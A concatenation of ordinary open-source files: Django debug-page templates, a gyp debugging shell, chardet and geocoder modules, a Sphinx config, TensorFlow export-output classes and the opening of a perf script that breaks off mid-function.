<td>{{ template_info.before }}<span class="specific">{{ template_info.during }}</span>{{ template_info.after }}</td></tr>
{% else %}
<tr><th>{{ source_line.0 }}</th>
<td>{{ source_line.1 }}</td></tr>
{% endifequal %}
{% endfor %}
</table>
</div>
{% endif %}
{% if frames %}
<div id="traceback">
<h2>Traceback <span class="commands">{% if not is_email %}<a href="#" onclick="return switchPastebinFriendly(this);">Switch to copy-and-paste view</a></span>{% endif %}</h2>
{% autoescape off %}
<div id="browserTraceback">
<ul class="traceback">
{% for frame in frames %}
<li class="frame {{ frame.type }}">
<code>{{ frame.filename|escape }}</code> in <code>{{ frame.function|escape }}</code>
{% if frame.context_line %}
<div class="context" id="c{{ frame.id }}">
{% if frame.pre_context and not is_email %}
<ol start="{{ frame.pre_context_lineno }}" class="pre-context" id="pre{{ frame.id }}">{% for line in frame.pre_context %}<li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>{{ line|escape }}</pre></li>{% endfor %}</ol>
{% endif %}
<ol start="{{ frame.lineno }}" class="context-line"><li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>{{ frame.context_line|escape }}</pre>{% if not is_email %} <span>...</span>{% endif %}</li></ol>
{% if frame.post_context and not is_email %}
<ol start='{{ frame.lineno|add:"1" }}' class="post-context" id="post{{ frame.id }}">{% for line in frame.post_context %}<li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>{{ line|escape }}</pre></li>{% endfor %}</ol>
{% endif %}
</div>
{% endif %}
{% if frame.vars %}
<div class="commands">
{% if is_email %}
<h2>Local Vars</h2>
{% else %}
<a href="#" onclick="return varToggle(this, '{{ frame.id }}')"><span>▶</span> Local vars</a>
{% endif %}
</div>
<table class="vars" id="v{{ frame.id }}">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in frame.vars|dictsort:"0" %}
<tr>
<td>{{ var.0|force_escape }}</td>
<td class="code"><pre>{{ var.1 }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% endif %}
</li>
{% endfor %}
</ul>
</div>
{% endautoescape %}
<form action="http://dpaste.com/" name="pasteform" id="pasteform" method="post">
{% if not is_email %}
<div id="pastebinTraceback" class="pastebin">
<input type="hidden" name="language" value="PythonConsole">
<input type="hidden" name="title" value="{{ exception_type|escape }}{% if request %} at {{ request.path_info|escape }}{% endif %}">
<input type="hidden" name="source" value="Django Dpaste Agent">
<input type="hidden" name="poster" value="Django">
<textarea name="content" id="traceback_area" cols="140" rows="25">
Environment:
{% if request %}
Request Method: {{ request.META.REQUEST_METHOD }}
Request URL: {{ request.build_absolute_uri|escape }}
{% endif %}
Django Version: {{ django_version_info }}
Python Version: {{ sys_version_info }}
Installed Applications:
{{ settings.INSTALLED_APPS|pprint }}
Installed Middleware:
{{ settings.MIDDLEWARE_CLASSES|pprint }}
{% if template_does_not_exist %}Template Loader Error:
{% if loader_debug_info %}Django tried loading these templates, in this order:
{% for loader in loader_debug_info %}Using loader {{ loader.loader }}:
{% for t in loader.templates %}{{ t.name }} ({{ t.status }})
{% endfor %}{% endfor %}
{% else %}Django couldn't find any templates because your TEMPLATE_LOADERS setting is empty!
{% endif %}
{% endif %}{% if template_info %}
Template error:
In template {{ template_info.name }}, error at line {{ template_info.line }}
{{ template_info.message }}{% for source_line in template_info.source_lines %}{% ifequal source_line.0 template_info.line %}
{{ source_line.0 }} : {{ template_info.before }} {{ template_info.during }} {{ template_info.after }}
{% else %}
{{ source_line.0 }} : {{ source_line.1 }}
{% endifequal %}{% endfor %}{% endif %}
Traceback:
{% for frame in frames %}File "{{ frame.filename|escape }}" in {{ frame.function|escape }}
{% if frame.context_line %} {{ frame.lineno }}. {{ frame.context_line|escape }}{% endif %}
{% endfor %}
Exception Type: {{ exception_type|escape }}{% if request %} at {{ request.path_info|escape }}{% endif %}
Exception Value: {{ exception_value|force_escape }}
</textarea>
<br><br>
<input type="submit" value="Share this traceback on a public Web site">
</div>
</form>
</div>
{% endif %}
{% endif %}
<div id="requestinfo">
<h2>Request information</h2>
{% if request %}
<h3 id="get-info">GET</h3>
{% if request.GET %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.GET.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No GET data</p>
{% endif %}
<h3 id="post-info">POST</h3>
{% if filtered_POST %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in filtered_POST.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No POST data</p>
{% endif %}
<h3 id="files-info">FILES</h3>
{% if request.FILES %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.FILES.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No FILES data</p>
{% endif %}
<h3 id="cookie-info">COOKIES</h3>
{% if request.COOKIES %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.COOKIES.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No cookie data</p>
{% endif %}
<h3 id="meta-info">META</h3>
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.META.items|dictsort:"0" %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>Request data not supplied</p>
{% endif %}
<h3 id="settings-info">Settings</h3>
<h4>Using settings module <code>{{ settings.SETTINGS_MODULE }}</code></h4>
<table class="req">
<thead>
<tr>
<th>Setting</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in settings.items|dictsort:"0" %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
</div>
{% if not is_email %}
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in your
Django settings file. Change that to <code>False</code>, and Django will
display a standard 500 page.
</p>
</div>
{% endif %}
</body>
</html>
"""
TECHNICAL_500_TEXT_TEMPLATE = """{% load firstof from future %}{% firstof exception_type 'Report' %}{% if request %} at {{ request.path_info }}{% endif %}
{% firstof exception_value 'No exception message supplied' %}
{% if request %}
Request Method: {{ request.META.REQUEST_METHOD }}
Request URL: {{ request.build_absolute_uri }}{% endif %}
Django Version: {{ django_version_info }}
Python Executable: {{ sys_executable }}
Python Version: {{ sys_version_info }}
Python Path: {{ sys_path }}
Server time: {{server_time|date:"r"}}
Installed Applications:
{{ settings.INSTALLED_APPS|pprint }}
Installed Middleware:
{{ settings.MIDDLEWARE_CLASSES|pprint }}
{% if template_does_not_exist %}Template loader Error:
{% if loader_debug_info %}Django tried loading these templates, in this order:
{% for loader in loader_debug_info %}Using loader {{ loader.loader }}:
{% for t in loader.templates %}{{ t.name }} ({{ t.status }})
{% endfor %}{% endfor %}
{% else %}Django couldn't find any templates because your TEMPLATE_LOADERS setting is empty!
{% endif %}
{% endif %}{% if template_info %}
Template error:
In template {{ template_info.name }}, error at line {{ template_info.line }}
{{ template_info.message }}{% for source_line in template_info.source_lines %}{% ifequal source_line.0 template_info.line %}
{{ source_line.0 }} : {{ template_info.before }} {{ template_info.during }} {{ template_info.after }}
{% else %}
{{ source_line.0 }} : {{ source_line.1 }}
{% endifequal %}{% endfor %}{% endif %}{% if frames %}
Traceback:
{% for frame in frames %}File "{{ frame.filename }}" in {{ frame.function }}
{% if frame.context_line %} {{ frame.lineno }}. {{ frame.context_line }}{% endif %}
{% endfor %}
{% if exception_type %}Exception Type: {{ exception_type }}{% if request %} at {{ request.path_info }}{% endif %}
{% if exception_value %}Exception Value: {{ exception_value }}{% endif %}{% endif %}{% endif %}
{% if request %}Request information:
GET:{% for k, v in request.GET.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No GET data{% endfor %}
POST:{% for k, v in filtered_POST.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No POST data{% endfor %}
FILES:{% for k, v in request.FILES.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No FILES data{% endfor %}
COOKIES:{% for k, v in request.COOKIES.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No cookie data{% endfor %}
META:{% for k, v in request.META.items|dictsort:"0" %}
{{ k }} = {{ v|stringformat:"r" }}{% endfor %}
{% else %}Request data not supplied
{% endif %}
Settings:
Using settings module {{ settings.SETTINGS_MODULE }}{% for k, v in settings.items|dictsort:"0" %}
{{ k }} = {{ v|stringformat:"r" }}{% endfor %}
You're seeing this error because you have DEBUG = True in your
Django settings file. Change that to False, and Django will
display a standard 500 page.
"""
TECHNICAL_404_TEMPLATE = """
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>Page not found at {{ request.path_info|escape }}</title>
<meta name="robots" content="NONE,NOARCHIVE">
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>Page not found <span>(404)</span></h1>
<table class="meta">
<tr>
<th>Request Method:</th>
<td>{{ request.META.REQUEST_METHOD }}</td>
</tr>
<tr>
<th>Request URL:</th>
<td>{{ request.build_absolute_uri|escape }}</td>
</tr>
</table>
</div>
<div id="info">
{% if urlpatterns %}
<p>
Using the URLconf defined in <code>{{ urlconf }}</code>,
Django tried these URL patterns, in this order:
</p>
<ol>
{% for pattern in urlpatterns %}
<li>
{% for pat in pattern %}
{{ pat.regex.pattern }}
{% if forloop.last and pat.name %}[name='{{ pat.name }}']{% endif %}
{% endfor %}
</li>
{% endfor %}
</ol>
<p>The current URL, <code>{{ request_path|escape }}</code>, didn't match any of these.</p>
{% else %}
<p>{{ reason }}</p>
{% endif %}
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in
your Django settings file. Change that to <code>False</code>, and Django
will display a standard 404 page.
</p>
</div>
</body>
</html>
"""
DEFAULT_URLCONF_TEMPLATE = """
<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="robots" content="NONE,NOARCHIVE"><title>Welcome to Django</title>
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; }
h2 { margin-bottom:.8em; }
h2 span { font-size:80%; color:#666; font-weight:normal; }
h3 { margin:1em 0 .5em 0; }
h4 { margin:0 0 .5em 0; font-weight: normal; }
table { border:1px solid #ccc; border-collapse: collapse; width:100%; background:white; }
tbody td, tbody th { vertical-align:top; padding:2px 3px; }
thead th { padding:1px 6px 1px 3px; background:#fefefe; text-align:left; font-weight:normal; font-size:11px; border:1px solid #ddd; }
tbody th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#summary { background: #e0ebff; }
#summary h2 { font-weight: normal; color: #666; }
#explanation { background:#eee; }
#instructions { background:#f6f6f6; }
#summary table { border:none; background:transparent; }
</style>
</head>
<body>
<div id="summary">
<h1>It worked!</h1>
<h2>Congratulations on your first Django-powered page.</h2>
</div>
<div id="instructions">
<p>
Of course, you haven't actually done any work yet.
Next, start your first app by running <code>python manage.py startapp [appname]</code>.
</p>
</div>
<div id="explanation">
<p>
You're seeing this message because you have <code>DEBUG = True</code> in your
Django settings file and you haven't configured any URLs. Get to work!
</p>
</div>
</body></html>
"""
|
katevontaine/myblog2
|
refs/heads/master
|
node_modules/gulp-sass/node_modules/node-sass/node_modules/node-gyp/gyp/pylib/gyp/generator/gypsh.py
|
2779
|
# Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""gypsh output module
gypsh is a GYP shell. It's not really a generator per se. All it does is
fire up an interactive Python session with a few local variables set to the
variables passed to the generator. Like gypd, it's intended as a debugging
aid, to facilitate the exploration of .gyp structures after being processed
by the input module.
The expected usage is "gyp -f gypsh -D OS=desired_os".
"""
import code
import sys
# All of this stuff about generator variables was lovingly ripped from gypd.py.
# That module has a much better description of what's going on and why.
_generator_identity_variables = [
'EXECUTABLE_PREFIX',
'EXECUTABLE_SUFFIX',
'INTERMEDIATE_DIR',
'PRODUCT_DIR',
'RULE_INPUT_ROOT',
'RULE_INPUT_DIRNAME',
'RULE_INPUT_EXT',
'RULE_INPUT_NAME',
'RULE_INPUT_PATH',
'SHARED_INTERMEDIATE_DIR',
]
generator_default_variables = {
}
for v in _generator_identity_variables:
generator_default_variables[v] = '<(%s)' % v
def GenerateOutput(target_list, target_dicts, data, params):
locals = {
'target_list': target_list,
'target_dicts': target_dicts,
'data': data,
}
# Use a banner that looks like the stock Python one and like what
# code.interact uses by default, but tack on something to indicate what
# locals are available, and identify gypsh.
banner='Python %s on %s\nlocals.keys() = %s\ngypsh' % \
(sys.version, sys.platform, repr(sorted(locals.keys())))
code.interact(banner, local=locals)
|
seguijoaquin/taller2-appserver
|
refs/heads/master
|
Appserver/Test/ApiUnitTesting/requests/packages/chardet/compat.py
|
2942
|
######################## BEGIN LICENSE BLOCK ########################
# Contributor(s):
# Ian Cordasco - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
if sys.version_info < (3, 0):
base_str = (str, unicode)
else:
base_str = (bytes, str)
def wrap_ord(a):
if sys.version_info < (3, 0) and isinstance(a, base_str):
return ord(a)
else:
return a
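# Hedged usage sketch, not part of the original module; the values below are
# illustrative. wrap_ord() smooths over byte-string iteration differences:
# on Python 2 a one-character str is converted to its ordinal, while on
# Python 3 iterating bytes already yields ints, so the value passes through.
if __name__ == '__main__':
    print(wrap_ord('A'))   # 65 on Python 2; 'A' is returned unchanged on Python 3
    print(wrap_ord(65))    # 65 on either version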
|
miraculixx/geocoder
|
refs/heads/master
|
geocoder/mapquest.py
|
3
|
#!/usr/bin/python
# coding: utf8
from __future__ import absolute_import
import re
import requests
from geocoder.base import Base
from geocoder.keys import mapquest_key
class Mapquest(Base):
"""
MapQuest
========
The geocoding service enables you to take an address and get the
associated latitude and longitude. You can also use any latitude
and longitude pair and get the associated address. Three types of
geocoding are offered: address, reverse, and batch.
API Reference
-------------
http://www.mapquestapi.com/geocoding/
"""
provider = 'mapquest'
method = 'geocode'
def __init__(self, location, **kwargs):
self.url = 'http://www.mapquestapi.com/geocoding/v1/address'
self.location = location
self.headers = {
'referer': 'http://www.mapquestapi.com/geocoding/',
'host': 'www.mapquestapi.com',
}
self.params = {
'key': self._get_mapquest_key(**kwargs),
'location': location,
'maxResults': 1,
}
self._initialize(**kwargs)
def _get_mapquest_key(self, **kwargs):
key = kwargs.get('key', mapquest_key)
if key:
return key
if not key:
url = 'http://www.mapquestapi.com/media/js/config_key.js'
timeout = kwargs.get('timeout', 5.0)
proxies = kwargs.get('proxies', '')
try:
r = requests.get(url, timeout=timeout, proxies=proxies)
text = r.content
except requests.exceptions.RequestException:
self.error = 'ERROR - Could not retrieve API Key'
self.status_code = 404
return
expression = r"APP_KEY = '(.+)'"
pattern = re.compile(expression)
match = pattern.search(text)
if match:
return match.group(1)
else:
self.error = 'ERROR - No API Key'
def _exceptions(self):
# Build intial Tree with results
if self.parse['results']:
self._build_tree(self.parse['results'][0])
if self.parse['locations']:
self._build_tree(self.parse['locations'][0])
@property
def lat(self):
return self.parse['latLng'].get('lat')
@property
def lng(self):
return self.parse['latLng'].get('lng')
@property
def street(self):
return self.parse.get('street')
@property
def address(self):
if self.street:
return self.street
elif self.city:
return self.city
elif self.country:
return self.country
@property
def quality(self):
return self.parse.get('geocodeQuality')
@property
def postal(self):
return self.parse.get('postalCode')
@property
def neighborhood(self):
return self.parse.get('adminArea6')
@property
def city(self):
return self.parse.get('adminArea5')
@property
def county(self):
return self.parse.get('adminArea4')
@property
def state(self):
return self.parse.get('adminArea3')
@property
def country(self):
return self.parse.get('adminArea1')
if __name__ == '__main__':
g = Mapquest('1552 Payette dr., Ottawa Ontario')
g.debug()
|
JuliaPackageMirrors/ReverseDiffSource.jl
|
refs/heads/master
|
doc/conf.py
|
5
|
# -*- coding: utf-8 -*-
#
# ReverseDiffSource documentation build configuration file, created by
# sphinx-quickstart on Tue Jun 17 11:18:11 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.mathjax',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'ReverseDiffSource'
copyright = u'2014, Frédéric Testard'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'ReverseDiffSourcedoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'ReverseDiffSource.tex', u'ReverseDiffSource Documentation',
u'Frédéric Testard', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'reversediffsource', u'ReverseDiffSource Documentation',
[u'Frédéric Testard'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'ReverseDiffSource', u'ReverseDiffSource Documentation',
u'Frédéric Testard', 'ReverseDiffSource', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
|
alexcuellar/odoo
|
refs/heads/8.0
|
addons/payment_sips/controllers/__init__.py
|
4497
|
# -*- coding: utf-8 -*-
import main
|
npuichigo/ttsflow
|
refs/heads/master
|
third_party/tensorflow/tensorflow/python/estimator/export/export_output.py
|
37
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Classes for different types of export output."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import six
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.saved_model import signature_def_utils
class ExportOutput(object):
"""Represents an output of a model that can be served.
These typically correspond to model heads.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def as_signature_def(self, receiver_tensors):
"""Generate a SignatureDef proto for inclusion in a MetaGraphDef.
The SignatureDef will specify outputs as described in this ExportOutput,
and will use the provided receiver_tensors as inputs.
Args:
receiver_tensors: a `Tensor`, or a dict of string to `Tensor`, specifying
input nodes that will be fed.
"""
pass
class ClassificationOutput(ExportOutput):
"""Represents the output of a classification head.
Either classes or scores or both must be set.
The classes `Tensor` must provide string labels, not integer class IDs.
If only classes is set, it is interpreted as providing top-k results in
descending order.
If only scores is set, it is interpreted as providing a score for every class
in order of class ID.
If both classes and scores are set, they are interpreted as zipped, so each
score corresponds to the class at the same index. Clients should not depend
on the order of the entries.
"""
def __init__(self, scores=None, classes=None):
"""Constructor for `ClassificationOutput`.
Args:
scores: A float `Tensor` giving scores (sometimes but not always
interpretable as probabilities) for each class. May be `None`, but
only if `classes` is set. Interpretation varies-- see class doc.
classes: A string `Tensor` giving predicted class labels. May be `None`,
but only if `scores` is set. Interpretation varies-- see class doc.
Raises:
ValueError: if neither classes nor scores is set, or one of them is not a
`Tensor` with the correct dtype.
"""
if (scores is not None
and not (isinstance(scores, ops.Tensor)
and scores.dtype.is_floating)):
raise ValueError('Classification scores must be a float32 Tensor; '
'got {}'.format(scores))
if (classes is not None
and not (isinstance(classes, ops.Tensor)
and dtypes.as_dtype(classes.dtype) == dtypes.string)):
raise ValueError('Classification classes must be a string Tensor; '
'got {}'.format(classes))
if scores is None and classes is None:
raise ValueError('At least one of scores and classes must be set.')
self._scores = scores
self._classes = classes
@property
def scores(self):
return self._scores
@property
def classes(self):
return self._classes
def as_signature_def(self, receiver_tensors):
if len(receiver_tensors) != 1:
raise ValueError('Classification input must be a single string Tensor; '
'got {}'.format(receiver_tensors))
(_, examples), = receiver_tensors.items()
if dtypes.as_dtype(examples.dtype) != dtypes.string:
raise ValueError('Classification input must be a single string Tensor; '
'got {}'.format(receiver_tensors))
return signature_def_utils.classification_signature_def(
examples, self.classes, self.scores)
class RegressionOutput(ExportOutput):
"""Represents the output of a regression head."""
def __init__(self, value):
"""Constructor for `RegressionOutput`.
Args:
value: a float `Tensor` giving the predicted values. Required.
Raises:
ValueError: if the value is not a `Tensor` with dtype tf.float32.
"""
if not (isinstance(value, ops.Tensor) and value.dtype.is_floating):
raise ValueError('Regression output value must be a float32 Tensor; '
'got {}'.format(value))
self._value = value
@property
def value(self):
return self._value
def as_signature_def(self, receiver_tensors):
if len(receiver_tensors) != 1:
raise ValueError('Regression input must be a single string Tensor; '
'got {}'.format(receiver_tensors))
(_, examples), = receiver_tensors.items()
if dtypes.as_dtype(examples.dtype) != dtypes.string:
raise ValueError('Regression input must be a single string Tensor; '
'got {}'.format(receiver_tensors))
return signature_def_utils.regression_signature_def(examples, self.value)
class PredictOutput(ExportOutput):
"""Represents the output of a generic prediction head.
A generic prediction need not be either a classification or a regression.
Named outputs must be provided as a dict from string to `Tensor`,
"""
def __init__(self, outputs):
"""Constructor for PredictOutput.
Args:
outputs: A dict of string to `Tensor` representing the predictions.
Raises:
ValueError: if the outputs is not dict, or any of its keys are not
strings, or any of its values are not `Tensor`s.
"""
if not isinstance(outputs, dict):
raise ValueError(
'Prediction outputs must be given as a dict of string to Tensor; '
'got {}'.format(outputs))
for key, value in outputs.items():
if not isinstance(key, six.string_types):
raise ValueError(
'Prediction output key must be a string; got {}.'.format(key))
if not isinstance(value, ops.Tensor):
raise ValueError(
'Prediction output value must be a Tensor; got {}.'.format(value))
self._outputs = outputs
@property
def outputs(self):
return self._outputs
def as_signature_def(self, receiver_tensors):
return signature_def_utils.predict_signature_def(receiver_tensors,
self.outputs)
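if __name__ == '__main__':
  # Hedged usage sketch, not part of the original module. It assumes
  # TensorFlow 1.x graph mode; the tensor values and the 'examples' key are
  # illustrative only.
  import tensorflow as tf
  scores = tf.constant([[0.9, 0.1]])        # float Tensor, as required above
  classes = tf.constant([['cat', 'dog']])   # string Tensor, as required above
  output = ClassificationOutput(scores=scores, classes=classes)
  # as_signature_def() expects a single string receiver tensor keyed by name.
  receiver_tensors = {'examples': tf.placeholder(dtype=tf.string, shape=[None])}
  print(output.as_signature_def(receiver_tensors))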
|
ARMP/ARM-Project
|
refs/heads/master
|
tools/perf/python/twatch.py
|
3213
|
#! /usr/bin/python
# -*- python -*-
# -*- coding: utf-8 -*-
# twatch - Experimental use of the perf python interface
# Copyright (C) 2011 Arnaldo Carvalho de Melo <acme@redhat.com>
#
# This application is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; version 2.
#
# This application is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
import perf
def main():
cpus = perf.cpu_map()
threads = perf.thread_map()
evsel = perf.evsel(task = 1, comm = 1, mmap = 0,
wakeup_events = 1, sample_period = 1,
sample_id_all = 1,
sample_type = perf.SAMPLE_PERIOD | perf.SAMPLE_TID | perf.SAMPLE_CPU | perf.SAMPLE_TID)
evsel.open(cpus = cpus, threads = threads);
